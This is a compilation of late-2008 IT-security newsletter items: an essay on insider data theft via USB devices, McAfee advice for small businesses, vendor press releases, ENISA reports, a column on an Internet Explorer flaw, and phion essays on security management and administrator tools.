Perimeter Security

In today's world our perimeter to be secured is not just the immediate physical of building walls, fences and borders.

by Michael Smith

While the Great Wall of China did something for that country by way of protection and a good perimeter fence and watchtowers may guard and protect a military or such installation, we must consider today, in the world of computers and the Internet, also and especially our virtual perimeter. This, in many case, is rather fluid.

While many companies, institutions, and others, place guards at their entrances, require passes of all kinds of levels, have fences, intruder sensors, and much more, despite the fact that they work rather on an international level, and have all manner of anti-virus protection and all manner protection against all manner of intrusions, by way of firewalls and such, few, so it would appear, have a policy in place to ensure that sensitive and mission critical data is not taken out by employees, especially temporary staff, or disgruntled staff, on removable medis such as floppy discs (yes, I am showing my age here, for I even remember when they, in fact, were floppy and rather big as well), to CDs/DVDs, USB flash memory, or even small removable USB hard drives.

We all have seen what can happen – and I am sure we all wonder where that data that was thus lost is now – when the likes of the British government offices sent data, very sensitive data, unencrypted, around the country on CDs.

Apparently, the real problem is that the two departments concerned have different encryption tools and the receiving department would not have been able to read the data had the discs been encrypted. No one thought of those implications before? Doh?!?

This is very much like NATO with all its different kinds of weapons and even communications systems all of which could really have caused a great deal of trouble had we ever had to go to war with the Warsaw Pact in those days. Unlike us they all had everything interchangeable. Proper compatibility should have been thought of one would have thought but, it does not seem to be thus. But, alas, those that sit in ivory towers.

Encryption is but one thing.

That, however, which often – more often than not – gets forgotten as far as securing data is the “physical” security of it and securing the ports – not the shipping kind though.

Who has access to the USB ports and do they need to be able to remove data by downloading it on removable media?

Organizations go to all lengths to control access to a network from the outside but often have no policy and measures in place for securing the devices. This means that basically anyone can steal sensitive data by using a USB memory stick, for instance, or an iPod.

The question is to ask who has access in an organization who could compromise data, as this could be more important than the possibility of an external breach and resultant data theft.

Too often only the “break in” from the outside into the system is being considered as far as data and security is concerned and the he possibility of data theft from within an organization by an employee is often overlooked.

Today with flash memory devices getting smaller and smaller and also being “concealed” in other objects, such as pens, and also getting more powerful with ever more data storage capacity plugging in a USB stick and copying a large amount of data only takes from some seconds to something like ten minutes and USB sticks nowadays are so common and, in fact, part of work, that the fact that someone has one or more on his or her person says and means nothing to the security guards, for instance. Hence the protection has to be at a different level.

Music players too, such as an iPod or similar, straight-forward MP3 player can often store data aside from just music files and are therefore also a way in which data can leave your institution; a way in which someone can take out data who, maybe, should not be able to.

Also, such devices, whether players or memory sticks, and such like, can be used by someone with malicious intent, whether employee or not, to inject malware into a PC or an entire network. All it needs is access to computer that is not locked down, for instance.

It would appear that many organizations do not have any systems and policy in place that control who may access and especially copy data to removable media of whatever kind.

All it takes, as we have seen more than once, is a disgruntled employee – or even an ex-employee whose password and such is still active – to ruin the reputation of an organization or to hold it to ransom.

© M Smith (Veshengro), December 2008
<>

Does size matter? When it comes to security, the answer is yes?

Why SMBs face the same security risk as larger businesses. McAfee explains…

By Greg Day, Security Analyst, McAfee International Ltd

Europe’s 19 million small and medium-sized businesses (SMBs) are operating in an increasingly competitive environment. They are becoming more and more reliant on technology to conduct business and remain competitive. As a result cyber criminals are shifting their focus to target SMBs, as illustrated by a recent survey by the GetSafeOnline initiative showing that 44 per cent of SMBs have been attacked.

The result of these attacks can be catastrophic to small businesses. Viruses, hacker intrusions, spyware and spam can result in a number of damaging consequences such as lost or stolen data, computer downtime, decreased productivity, compliance issues, lost sales and even loss of reputation. These types of effects can be damaging to any size business, but in particular an SMB, which has limited technical staff, restricted security budget and fewer backup support options meaning the business could be crippled by any of these attacks.

But worryingly the general consensus among the small business community in Europe is that they are just too small to be of any value to cyber criminals, 56% don't even think they could make cyber criminals money. As well as being naïve about the potential value they can offer to hackers, as many as 90% think they are adequately protected when it comes to IT security. This is a dangerous misconception and SMBs need to understand why they are at risk and how best to protect their business and raise IT security up the companies priority list.

This is of course a huge challenge for SMBs to address. As a security expert McAfee understands that fighting viruses, malicious code and fending off phishing (or even SMSishing) attacks is a full time job. It’s a challenge and it’s difficult to find time in the day to dedicate to this especially when the business is battling with limited resources and budget.

McAfee conducted the ‘Does Size Matter?’ research report to identify to what extent European SMBs are actually at risk and assess how much time and effort is spent on maintaining security protection. The survey found that on average SMBs have just one hour a week to dedicate to IT security. Whilst this is understandable with the challenges that smaller businesses have to face something needs to be done to address this balance.

It is unrealistic to expect small businesses to re-direct huge amounts of budget or time into the area of IT security so how best can SMBs address this issue? Firstly it is important to implement the right technology. It can be a confusing process navigating the security product landscape but by implementing a managed security product, SMBs have that pressure removed and can be confident they are receiving the right protection.

Secondly, as well as implementing the right technology there are a number of steps that SMBs can take in terms of education to ensure the business remains protected and truly does go under the radar of cyber criminals. These range from deleting emails from unknown sources, not opening attachments, as well as backing up files and keeping sensitive information such as credit card details protected. Education is key and can go a long way in terms of minimising risk.

The research proves that SMBs are as much at risk as larger enterprises and it is important for business leaders to be made aware now so steps can be put in place before the business is lost as a result of an attack. Hackers can make money out of any size business and as SMBs increasingly become digitalised and dependent on technology, this will become an even bigger problem.

Tips for protecting your systems from hackers and viruses:
1. Never open email attachments or download files from unknown sources
2. Beware of unknown emails with vague subject lines e.g. “document” or “re:document” – they could be a virus. Avoid opening email attachments when the subject line is suspicious even if it appears to come from a friend or someone you know. When downloading files from the Internet, make sure that the source is a legitimate and reputable one
3. Delete chain emails and junk email. Do not forward or reply to any to them. These types of email are considered spam, unsolicited mail that may contain viruses
4. Keep your anti-virus updated. There are over 80,000 known viruses and 500 new ones appear every month. Use anti-virus software and services that regularly update current virus information and its scanning engine
5. Back up your files. A virus can destroy your files. Make sure you backup your files regularly and keep your back up copy in a separate location from your work files, preferably not on your PC hard drive
6. Ensure your computer’s operating system is up to date by visiting the manufacturer’s website (e.g. Microsoft)
7. Never enter your credit card or password details unless you are sure the site is real / protected

McAfee International Ltd is exhibiting at Infosecurity Europe 2009, Europe’s number one dedicated Information security event. Now in its 14th year, the show continues to provide an unrivalled education programme, the most diverse range of new products & services from over 300 exhibitors and 12,000 visitors from every segment of the industry. Held on the 28th – 30th April 2009 in Earls Court, London this is a must attend event for all professionals involved in Information Security. www.infosec.co.uk

New Software-as-a-Service approach to Capacity Management for SMEs

Milan, December 2008 - Neptuny, a leading solution provider in performance optimization for IT, introduces Caplan™ SaaS (Software-as-a-Service), to provide efficient Capacity Management also for Small to Medium-sized Enterprises who want to set up a small-scale Capacity Planning and Management project.

Caplan™ is able to cover multiple domains in one single solution, while having zero impact in production environments thanks to its agent-less architecture, the out-of-the-box integration to major management platform and tools and the ability to easily integrate custom data sources. It is the most feature-rich and mature solution available in the market, providing advanced analyses, forecasting and reporting capabilities by means of easy-to-use web interfaces and dashboards. Caplan™ capability to align IT resources and business initiatives facilitates realization of the real value of IT investments.

Neptuny’s CaplanTM SaaS provides all the benefits of the standard edition of CaplanTM and enables organizations to benefit from the same powerful features without any infrastructure and maintenance cost. It is the first Capacity Management solution available on the market that complies with the Software-as-a-Service paradigm. CaplanTM SaaS provides a faster time-to-value and allows customers to better align their Capacity Management process to their needs.

According to Butler Group, CaplanTM SaaS “is a perfect fit for Small to Medium-sized Enterprises (SMEs) wanting to undertake a small-scale capacity planning and management exercise, and could also aid mid-sized organisations in their short-term capacity planning needs. ... The SaaS model can also be used as a Proof of Concept (PoC) for customers wanting to undertake a large deployment exercise.”

Fabio Violante, Neptuny CEO, commented “We at Neptuny believe that our SaaS proposal for Capacity Management will enable us to help Small to Medium-sized enterprises with a short-term, small-scale project to leverage to easily get the benefits provided by Caplan™”.

CaplanTM SaaS - Key Features
· High-availability service with no setup and maintenance costs: CaplanTM SaaS infrastructure is hosted in a high-availability data centre. CaplanTM SaaS does not require new hardware to be installed at the customer site. All maintenance activities are guaranteed directly from Neptuny’s support (24x7). Customers do not have to manage the database and other components of the system, the service is upgraded automatically, and no ongoing effort and costs of maintenance is required once the service starts.
· Secure and easy-to-use web interface: CaplanTM SaaS is accessible from the Internet. All user functionalities are accessible via a web interface structured to enable the entire lifecycle of Capacity Management process (e.g. data gathering, analysis and model building and reporting); access to data and functionalities can be restricted by means of Access Control Lists in order to assign roles according to user responsibilities. Data and access security are guaranteed by SSL encrypted communications.
· Flexible Service: Users can subscribe to CaplanTM SaaS for a variable period of time (e.g. 6 months) at end of which the service is renewable for additional periods. CaplanTM SaaS allows customers to lower costs. Users are allowed to subscribe a service tailored to their needs in terms of number and type of items (e.g. virtual server, storage arrays, mainframe, ...) and functionalities (forecasting, predictive monitoring, by exception reporting, ...); they are enabled to implement a capacity management process with the right level of maturity and evolve it according their organization changes.

Neptuny is a leading Solution Provider in performance optimization for both IT and Digital Media. For more than a decade, Neptuny expertise and technologies have been crucial to help customers in different industries (Telco, Banking, Insurance, etc.) to improve the business outcome of their infrastructures and services. Neptuny solutions have been proven to provide sensational ROI by means optimization and capacity management initiatives.

Please find more information on Neptuny and Caplan™ at www.neptuny.com.

Source: Darshna Kamani, Eskenzi PR Ltd
<>

Access everywhere-secure nowhere? EU-Agency ENISA launches Position Paper on mobile eID security issues

Mobile eID-for better or for worse? Your mobile is fast becoming your new PC, wallet, identity card, but is it secure? The EU Agency ENISA (the European Network and Information Security Agency) launches a Position Paper on authentication issues for mobile

In the near future, we will pay our taxes, buy metro tickets or open bank accounts over our phone. Mobile devices, national ID-cards, smart phones and (Personal Digital Assistant) PDAs, will play an ever more important role in the digital environment. The mobile devices can act as an identity or payment card for online services. In Asia, there is already a growing demand for these services, particularly in Hong Kong, Singapore and Taiwan. The main driver in Asia is consumer interest for convenient, easy solutions, in as few devices as possible. In Europe, by contrast, the main driver is enhanced security with the mobile phone seen as a security identification tool for example in electronic ticketing, payment and even online banking.

But the use of mobile devices also brings new security and privacy risks. A user may continuously leave traces of their identity and transactions, even by only carrying the device in their pocket. There is an increase of stolen mobile devices containing key personal user information. Although secure components (based on smart card technology) exist, due to increasing complexity, mobile devices are now prone to attacks which before applied only to desktop PCs. Among the top ten "e-Threats" in 2008, BitDefender lists exploitation of mobile device vulnerabilities three times. The "E-Threats Landscape Report" tell us that mobile devices are increasingly targeted by new generations of viruses because of their permanent connectivity and the increasing use of SMS scams. Therefore, only seeing the use of mobiles as personal trusted and trustworthy devices should be approached with care. The Executive Director of ENISA, Mr Andrea Pirotti observes:

'New services and opportunities are being developed which many users will find beneficial in their daily life. We strongly believe that if these new technologies are applied the right way, they also constitute a big opportunity for secure, sophisticated authentication mechanisms vital to future applications and services.'

The ENISA Position Paper is available at:
http://www.enisa.europa.eu/doc/pdf/deliverables/enisa_pp_mobile_eid.pdf

Have your say! To influence the future of European Network and Information Security: please give your opinion in the online public consultation:
http://ec.europa.eu/yourvoice/ipm/forms/dispatch?form=InfsoNis

Source: ENISA - European Network and Information Security Agency
<>

The Scandinavian approach to Awareness Raising: ENISA survey reveals how 100 European Local Governments 'can do more'

The EU Agency ENISA presents the results of a survey of 100 Scandinavian local government's data management efforts within health, hospital, regional development, education and public transportation services

One of the most common privacy infringements is wrongful access to a patient's sensitive data. Health care services, hospitals, public transport and education systems at regional and municipal level alike all treat personal data, with inherit risks. The study portrays how 110 regions and municipalities, responsible for the services above in the three Scandinavian countries, Denmark, Norway and Sweden are working on the secure management of such information. The conclusion is that not enough attention is paid to raising awareness among staff, but generally the authorities do well in terms of technical systems and policies.

A total of 110 public bodies, (of which 97 municipalities and 13 regions) responded to a 54 questions-survey. The responses are consolidated and analyzed in a Scandinavian perspective. The survey focused on four areas: 1. Managing IT Risks, 2. Information Security Management, 3. Policy Enforcement, 4. Awareness Management- securing employee compliance and attention to policies, roles and responsibilities. Overall, the survey shows that the bodies have focused on: 1. Risks, 2. Goals for information security (policy), 3. Creating a framework for information security management. 4. With regard to the staff awareness, the survey confirms that:

- Rights, obligations and sanctions are typically described by the bodies
- Staff is to some extent given access to security rules
- Little is done to provide knowledge through further training
- Knowledge of rules is rarely followed-up
- Undesired behaviour is rarely followed-up

The Executive Director of ENISA, Mr. Andrea Pirotti observed: "This report underlines the fact that staff must first be aware of a) what data has to be protected and b) why, it if they are to comply with security rules. The situation is good, but not good enough: more still has to be done."

The report is the result of the kind support by the ENISA Awareness Raising (AR) Community.

For further information: http://www.enisa.europa.eu/

Source: ENISA - European Network and Information Security Agency
<>

ProDefence Releases Enterprise Software Solution for VMware Virtual Server Backups

iBac VIP Simplifies ESX Server and Virtual Machine Backup

Worthing—December 2008—ProDefence, a UK distributor of eSecurity products and services across the UK and Ireland, announced today that they will be launching an enterprise backup solution for VMware virtual servers. iBac Virtual Infrastructure Proxy (iBac VIP) is designed and manufactured by Idealstor, leaders in removable disk-to-disk backup solutions to offer an easy to use and affordable solution for backing up data in a VMware virtual server.

iBac VIP has been written from the ground up with VMware backup in mind and is designed specifically for VMware virtual machines running in an ESX server environment. VIP is licensed per ESX server regardless of the number of virtual machines or processors running on the ESX server. This enables companies to quickly add new VMs without having to worry about purchasing additional backup agents for each virtual server.

iBac VIP ties into the VCB framework provided by VMware. Because of this, the load from running backups is removed from the ESX server and offloaded to a dedicated 2003 backup server. This ensures that backups will not put a large load on the ESX server which can affect the performance of virtual machines. VIP can backup data residing on a fibre channel or iSCSI SAN or can backup data directly from the ESX server over the LAN. VIP offers a simple user interface that provides scheduling, logging email reporting and the ability to backup multiple ESX servers on the LAN or in remote data centers.

Because iBac VIP is designed to run on a Windows 2003 Server, VIP can be tightly integrated into Idealstor’s range of removable disk backup solutions. This enables VIP jobs to be sent straight to the Idealstor removable drive bays which can then be sent offsite in place of tape for offsite storage and disaster recovery. While it is not required to use Idealstor equipment as the VIP proxy server, the Idealstor Backup Appliance comes pre-loaded with Windows 2003 Server enabling this one solution to eliminate the need of having to use a separate server, tape library and backup software to backup VMware virtual machines.

“iBac was originally released in 2005 with the goal of offering an easy to use yet robust backup application for Windows servers”, said Ross Holmes, Sales Manager of Prodefence the UK based distributor of Idealstor “Over the years our clients have increasingly migrated to VMware and reached out to us to help them with their virtual server backups. Rather than Idealstor simply modifying their existing software for use with VMware like most software companies have done, they have developed VIP from the ground up with the unique requirements of VMware in mind. Because VIP is licensed per ESX server, licensing is less complicated and is far more affordable than having to purchase expensive and resource consuming backup agents for each VM.”

ProDefence is a UK distributor of eSecurity products and services throughout the UK and Ireland. ProDefence offers the highest level of account management and technical support within the security channel. www.prodefence.co.uk

Idealstor manufactures removable/ejectable disk backup systems that are designed to augment or completely replace tape as backup and offsite storage media. The Idealstor Backup Appliance has been on the market for over 5 years offering a fast, reliable and portable alternative to tape based backup systems. Each Idealstor system uses industry standard SATA disk as the target for backup data and as offsite media. Systems range from 1 removable drive up to 8 and can be used by a range of businesses from SMB to corporate data centers. Disk capacities mirror that of the major SATA manufacturers. Uncompressed capacities of 200GB, 320GB, 400GB, 500GB, 750GB, 1TB and 1.5TB are currently available.

Source: Yvonne Eskenzi - PR for ProDefence
<>

Interxion to Expand Brussels Data Centre

Interxion, a leading European operator of carrier-neutral data centres, today announced significant expansion plans for its data centre in Zaventem, Brussels. In response to growing demand for the company’s infrastructure and services, the amount of equipped space will be expanded by 2,200 m², effectively doubling the facility’s size. The first phase of the new space is scheduled to be operational in February 2009.

The new space will offer redundant power and N+1 cooling, as well as the most advanced alarm and monitoring systems. It will support both standard and high density power configurations, and has been designed using Interxion’s energy efficient modular architecture, with free cooling and maximum-efficiency components as standard.

“The new expansion is a logical response to the high levels of demand we are experiencing in the Belgian market,” explained Jo Mariens, Managing Director of Interxion Belgium.

“Customers who sign in for the new space will benefit from the central location of our data centre, high security, a robust power supply and a wide range of connectivity options including peering opportunities with the popular BNIX internet exchange.”

Interxion is a leading European operator of carrier-neutral data centres. Headquartered in Schiphol-Rijk, The Netherlands, Interxion serves its customers from 24 carrier-neutral data centres located in 13 cities across 11 European countries. Interxion serves network and carrier-based, hosting and enterprise customers who require professionally managed and strictly controlled physical environments within which to operate mission-critical applications and computer systems. Interxion’s data centres offer cost-effective and fast access to multiple local and global communication networks.

For more information please visit www.interxion.com

Source: Spreckley Partners Ltd
<>

Brocade Network Monitoring Service Improves Data Availability and Efficiency

Provides Customers a Secure, Highly Reliable Remote Monitoring, Alerting, and Reporting Service for Their Data Centre Fabrics—Optimising Resources and Enabling Infrastructure Growth without Hiring

Brocade® has announced the next-generation Brocade Network Monitoring Service (NMS), which provides organisations with an end-to-end remote monitoring, alerting, and reporting service for their data centre fabrics. Brocade NMS now provides 24×7 expert end-to-end monitoring about the health and status of data centre fabrics to help maximise network efficiency, availability, and uptime. Moreover, Brocade NMS provides organisations with valuable information and rules-based business intelligence to maximise application availability and optimise data centre resources. Through this service, IT organisations can better manage growing and increasingly complex data centre infrastructures with their current staff.

“Managed services are one of the fastest-growing segments of the storage services market,” said Gartner Storage Services Principal Analyst Adam Couture. “Gartner anticipates that in a weakened economy this should accelerate as IT departments are asked to do more with less and may have headcounts frozen or even reduced.”

According to Gartner’s 2008 CIO survey, business intelligence is a top technology priority. Brocade NMS helps fulfil that need by providing deeper business intelligence, enabling organisations to make faster and more-informed decisions. Brocade NMS does this by integrating expertise from knowledgeable storage and networking professionals with a comprehensive monitoring approach, advanced event management, and predictive diagnostic techniques. This integration can help reduce overall problem resolution time by almost one hour per event, resulting in decreased downtime costs and increased productivity to subscribers.

In addition to 24×7 monitoring, Brocade NMS collects and analyses a wide variety of performance, utilisation, and throughput data. Real-time alerts warn administrators of networking issues, bottlenecks, or potential system outages, thereby enabling proactive action to minimise or avoid an impact to application performance and availability. Real-time and historical data and flexible reports are generated automatically and are available via a secure Web portal. As a result, organisations can analyse historical trends, optimise resource utilisation and cost-effectively plan future capacity.

New features of Brocade NMS include:
· Expanded monitoring and reporting from extension devices into the data centre across all Brocade products and many third-party products, creating an end-to-end view of the data centre fabric.

· A flexible new architecture that enables policy-based monitoring, event correlation, and “yellow light” alerts to increase business intelligence and enable a more proactive approach.

· An infrastructure that provides faster, more reliable access, as well as enhanced security. An enhanced reporting platform provides real-time and historical performance information along with flexible, customisable reports and data views to meet specific requirements.

· More precise fault determination across the data centre fabric for faster resolution and increased ability to meet application SLAs.

“The newly enhanced Brocade NMS helps customers get the most value from their data centre network investments and ensures that under-staffed IT resources can focus on the business,” said Hugues Meyrath, Vice President and General Manager of Brocade Global Services. “Through constant monitoring and reporting, Brocade NMS helps ensure that our customers’ data centre networks are running optimally and that applications and data are readily available to users.”

Brocade is a leading provider of data center networking solutions that help organizations connect, share, and manage their information in the most efficient manner. Organizations that use Brocade products and services are better able to optimize their IT infrastructures and ensure compliant data management. For more information, visit the Brocade Web site at www.brocade.com or contact the company at info@brocade.com.

For more information visit www.brocade.com/nms

Source: Spreckley Partners
<>

Major flaw revealed in Internet Explorer; users urged to switch

Yet another problem with IE - oh dear!

by Michael Smith

A major new security flaw that affects all versions of Internet Explorer from IE5 to the latest beta of IE8 has been discovered. The attack has serious and far-reaching ramifications – and they are, so we understand, not just theoretical attacks. This flaw, in fact, is already in wide use as a tool to steal online game passwords, with some 10,000 websites infected with the code needed to take advantage of the hole in IE.

Virtually all security experts – and that includes us at ICT Review – are counseling and encouraging users to switch to any other web browser; none of the others are affected,such as Firefox, Chrome, or Opera. Do so at least for the time being, though Microsoft has stubbornly said it "cannot recommend people switch due to this one flaw." How could and would they recommend anyone to switch anyway and anyhow. They want people to use their faulty products, same as with the software in general. In addition to that their websites – many of them anyway – in the Windows Live department do seem to have problems rendering properly in other browsers. No surprise there on either count.

Microsoft adds that it is working on a fix but has offered no estimated times on when that might happen and be ready to be released on the unsuspecting public. Meanwhile it offers some suggestions for a temporary patch, including setting your Internet security zone settings to "high" and offering some complicated workarounds.

There some reports state, however, that none of those the fixes actually work, and that also does not surprise me after the fiasco with a patch that screwed up the workings of a number of encrypted USB drives, such as Cruzer Enterprise and the hotfix to fix this not fixing anything at all.

It is most essential now immediately that the flaw be patched but as a patch dopes not to appear to be forthcoming in the very near future there is but one advice that one gan give: change your browser NOW. Get Firefox.

Security pros fear that the attack will soon spread beyond the theft of gaming passwords and into more criminal arenas, of which there can be no doubt, as the malicious code can be placed on any website and can be adapted to steal any password stored or entered using the browser.

Now it is very much down to the issue of time: Will Microsoft repair the problem and distribute a patch quickly enough to head off the tsunami of fraud that's about to hit or will it come too late to do any good?

Meanwhile, one can but reiterate the advice and recommendation: Switch from Internet Explorer as soon as you can. You can always switch back once the threat is eliminated, as you need not to uninstall Internet Explorer. Just do not use it for the present time.

I can also nigh on guarantee that once you have experienced the likes of Firefox browser and the security that it offers, especially with the add ons that are available – ensure though that you only download and install add ons that are from the Mozilla website and not from any others. Those from the Mozilla sites are guaranteed to work and free of malware.

© M Smith (Veshengro), December 2008
<>

Security Management

Author: phion AG

Managing similarities
Web-based business processes are nowadays part and parcel of day-to-day operations in most companies, while networking marches on triumphantly. An ever-increasing number of sites, including even the smallest field office, are being integrated into communication infrastructures so that they can enjoy the benefits of centralised availability of data, simple application deployment and seamless workflows. The upshot for users is that it makes their job easier, and for companies, it boosts productivity. However on the downside it means a task that security and network managers can barely cope with as a result of the explosion in the number of systems requiring support for a whole variety of ‘behind-the-scenes’ tasks.

Companies and managed security providers have inevitably accepted the fact that the number of security gateways increases with every new site and customer. But setting up, configuring and the ongoing operation of these countless systems with their complicated interactions are creating a huge management effort. As a result this casts doubt over the systems’ efficiency on the one hand, while having a negative impact on their smooth operation on the other, given that where a great deal of management is required there is also a greater of scope for error. This situation is then aggravated by the number of connectivity and WAN optimisation systems, which are also growing, as well as by other devices which populate networks in addition to security gateways. They all perform special tasks and are not, strictly speaking, part of IT security, but they still must integrate seamlessly with the entire system concept.

Achieving a dramatic reduction in complexity
It has obviously not escaped the notice of security providers that the complexity of security infrastructures is gradually assuming nightmare proportions. Using enhanced interfaces and simplified operational concepts for these security gateways should make it more efficient to manage these systems, but this is simply not enough in most cases. How easy an individual gateway is to install and maintain does not come into it any more. In any case the sheer number of systems requires a huge investment in time and staff. The issue of integrating adjacent technologies will not even be touched, let alone solved by providing gateways with a more attractive management interface.

A radical approach is needed to enable companies to manage their infrastructure efficiently not just in the short term but in the future as well. In this case there are various courses of action available for permanently reducing the complexity of the task to a manageable level, while also ensuring the system’s efficient operation. The first option is to manage security gateways in a smarter way, leveraging the similarities that systems have, thereby reducing the administrative effort. One step that is just as important is to enable technologies which have been separate to converge as part of a small number of systems administered centrally. In addition, 100% traceability must be guaranteed for changes made to the infrastructure as a lack of transparency is one of biggest causes of errors and avoidable effort.

Managing similarities
The following simple example clearly highlights the crux of security management. If a new housing estate is built, all the houses will initially be identical in terms of décor and the materials used etc. In this situation it is obviously very easy to make sweeping decisions on how to expand the estate further. But as soon as tenants move in, specific adaptations will be made sooner or later. Implementing extensive measures affecting the whole estate now requires a significantly higher degree of planning. However, the individual apartments are basically not that different from each other and you will be able to find more far-reaching similarities in many areas. But if these similarities are ignored all the apartments will have to be considered as individual, completely different units. On the other hand, the common features they have are no longer enough to be able to treat all the apartments in the same way.

Why does this management of similarities remain an unresolved problem for many security product manufacturers, even though the potential for improvement is obvious? The answer to this is based on the underlying management concepts. Traditional approaches mainly involve either profile-based or device-based management. Profile-based management is ideal for managing a large number of identical gateways. However, it takes some effort to map individual features for each system. In total contrast, device-based management focuses completely on the specific features of the individual devices, but it is not conducive at all to the efficient management of a large number of systems.

Consequently, the ideal solution can only be achieved through combining profile-based management with device-based management, exactly in the way being publicised by phion for instance. Given the fact that phion is a relatively new company, this Austrian solution provider is not encumbered by legacy technologies and so it was able to develop a management concept that is radically different from traditional approaches. Firstly, it allows you to map individual requirements on the gateways, while at the same time supporting efficient, comprehensive management of common features. As a result, the benefits of profile-based and device-based management have been combined and the disadvantages avoided.

Security technology convergence
Being able to manage similarities between security gateways more efficiently is a necessary fundamental step, but only the first one. Company networks are teeming with countless other devices, ranging from routers and switches to WAN optimisers and traffic intelligence systems. The use of all these devices is undoubtedly justified, but their complex interactions hinder the introduction of comprehensive work processes and devour the majority of the IT department’s capacity.

In view of this situation, the trend within security technology is clearly shifting towards convergence. This means that technologies which are adjacent and logically complement each other are being integrated into solutions and comprehensive management concepts. This obviously includes first and foremost security and high availability functions. But elements such as traffic intelligence and WAN optimisation should not be disregarded either, especially with the ongoing process of adding subsidiary offices to networks. Traffic intelligence ensures that communication links are not disrupted even if lines are disconnected and that important data traffic always reaches its destination. WAN optimisation, on the other hand, guarantees that the volume of data traffic is kept as low as possible using different procedures in order to speed up response times.

This is why netfence gateways have already combined from the very start security with high availability and traffic intelligence. Integrating additional WOC functionality offers companies the chance to provide their subsidiaries with security and reliable communication in a single rollout process, as well as to administer their infrastructure using a single central management approach.

Summary
Nowadays, the efficiency of the entire security infrastructure is determined more than ever by how efficiently it is managed, both from a financial and functional perspective. But this alone is not enough. Only if the key adjacent technologies also converge in the security solutions deployed can the entire infrastructure be managed sensibly in financial and technical terms.

Recycle the CISO – the possibilities are endless

London, UK – 15th December 2008 - Gerry O'Neill, a senior contributor to the Infosecurity Adviser - the online community for the information security industry, created by the organisers of Infosecurity Europe – notes that never before have there been so many vacancies in the CISO community.

Gerry O’Neill, says that it is now clear that the current economic downturn is having an effect on the employment of IT security professionals, with several redundancies already noted. There is an opportunity and companies should take advantage of the wealth of IT security talent currently available in the IT security managerial sector.

"What we are seeing is record number of vacancies in the IT security sector, most notably on the CISO - Chief Information Security Officer - side of things. We're therefore encouraging organisations to widen their search and consider employing from the wider pool of equally competent and available accredited security professionals with proven abilty." said Gerry O'Neill, CEO of IISP.

According to O'Neill, the fact that a large number of CISOs roles now on the job market are being offered to a limited group could be seen as a short-sighted tactic, when they are missing the opportunity to cast the net more widely.

"Not only does this recruitment strategy deprive companies of their best options for senior IT security professionals, but it will create a shortage of CISOs in the market in the longer term. This is a lose - lose situation that can easily be avoided," he added.

It is also evident that there have also been some redundancies, which is a short sighted move by employers. The fact is that in a downturn criminals will be seeking out fraud and espionage opportunities, sometimes with the help of disgruntled employees who are about to lose their jobs. This is not the time to remove the staff who survey the security and governance landscape acting as an organisations key defence. Now is the time when all organisations should be strengthening their safety net, particularly when all the predictions are that cyber criminal activity will increase dramatically in 2009” he said.

For more on Gerry O'Neill's CISO comments: http://www.infosecurityadviser.com/view_message?id=84

For more on Infosecurity Adviser: http://www.infosecurityadviser.com/home

by Neil Stinchcombe – InfosecurityPR
<>

Seeing the administrator as a user

Usability of administration tools often leaves a lot to be desired

by Dr. Klaus Gheri, CTO phion

In general, administrators are very enthusiastic about technology and are definitely not fazed by code and scripts. However, the fact that administrators are technically literate users is too often used as a poor excuse by software developers for offering administration tools that are seldom appealing and user-friendly. Administrators are, after all, people too. They respond just as positively to an improvement in ergonomic function as any Office user just a few offices along the corridor. Confusing GUIs with too much or even wrong information hamper efficiency, while unnecessarily long-winded and complicated work processes detract from job satisfaction. This can even result in security risks.

Unlike ordinary users, administrators require detailed technical information to enable them to carry out routine analyses or look into faults in the environment where the products are being used. This means that administration tools must be designed so that, on the one hand, they can present dense information in a clear, concise manner, while also allowing access to details and settings with just a couple of mouse-clicks. The ideal scenario is that based on the Pareto principle, 80-90% of all troubleshooting actions can be carried out quickly, without having to spend ages trawling through log files.

Getting to grips with the system’s inner workings
At the moment, most network administration centres are nowhere near achieving this situation. An administrator’s daily work typically involves using tools offering a variety of functions, but which can only handle operational activities to a limited extent. They force administrators to exit frequently from the GUI, and only for trivial reasons, such as to use a capture tool (e.g. Tcpdump) to record certain network activities on the system or to get involved in the inner workings of the system via the system console, which can, as is well known, end in grief.

If we look at the typical interaction administrators have with their system tools, we can clearly see three basic, effort-intensive areas of activity:

1. Systems operation, diagnostics and troubleshooting
2. Reporting
3. Configuration and lifecycle management.

The first area, systems operation, diagnostics and troubleshooting, is the one where companies generally expend the most effort. In this case, using smart tools to reduce the number of steps involved improves the administrator’s lot, thereby cutting costs and boosting productivity in the company, as resolving problems in particular can now be carried out more efficiently.

In practice, providing administrators with an information architecture which allows them to get down to the required information level quickly has proved to be a success. This concept should be applied in the GUI in the form of the following items:

a)Real-time status information – this is required to provide a quick overview of the current system activities going on. One key aspect in terms of making it user-friendly is to provide a simple option for setting filters. This will allow administrators to decide in a rough manner what is of interest to them.

b)Apart from providing real-time status, a cumulative short history of activities has also been helpful. It provides another higher level of abstraction than the log file analysis and makes it possible in many cases to quickly say: “The client never accessed the gateway” or even “Access was refused because the password was wrong”.

c)As administrators do not always want to be stuck in front of the console, there should be some way for important messages to reach them. Eventing is a form of active log where it is important that the delivery of event messages can be configured in a flexible manner. For instance, administrators can indicate the urgency of a problem using visual warnings on screen and acoustic warning signals on the computer. In even more urgent cases, they could send a message via SMS to the mobile. The administrator can adapt the process to the team’s usual way of working so that any incident will be dealt with in a sufficiently prompt manner.

d)Statistics and graphs are a 4th level which can be used to help people gain a better understanding of what is going on. A picture does not always say more than a thousand words, but it always says more than a long column of figures. In this case, it is important to focus on the fact that visual representations are available in real time to support time-critical analyses.

e)Finally, the log file is the last level of analysis where the other options are no longer of any use. But this does not mark the point where the concept of usability reaches its limits. A functionally rich viewer should be used to speed up the analysis of log files, especially one offering flexible filter options. Otherwise, it takes a huge amount of time working through the large quantity of data in the log files.

The statistics and graphs mentioned above already cover many of the typical reporting requirements, the second area referred to above. If administration tools make it possible to display all current parameters graphically and a fully centralised management console collates all the information from the individual components, very large parts of the reporting task can be automated.

As far as the third area is concerned, configuration and lifecycle management, it is essential that there is also an administration tool really capable of covering the entire scope of the configuration. This places a great demand on the systems’ architecture as the benefits of easy management cannot be added on whenever it suits afterwards. Manufacturers must include these benefits in their plans right from the outset during product development, based on a bottom-up principle. In contrast to this, administrators are often faced with an umbrella-type management that has evolved over the years where every management feature is integrated individually, but only relates to a partial aspect of the system, for instance, the set of rules for firewalls, but not for the rest of the system configuration.

In addition, administrators can use management concepts which can facilitate their everyday work, such as object orientation and a good user interface. Object orientation improves the configuration’s consistency and can help speed up immensely the task of making changes to the configuration. For example, IP addresses or networks can be used as objects with meaningful names in configuration files. When the object’s content is modified this applies to every instance where it has been referred to.

Good GUIs prevent mistakes
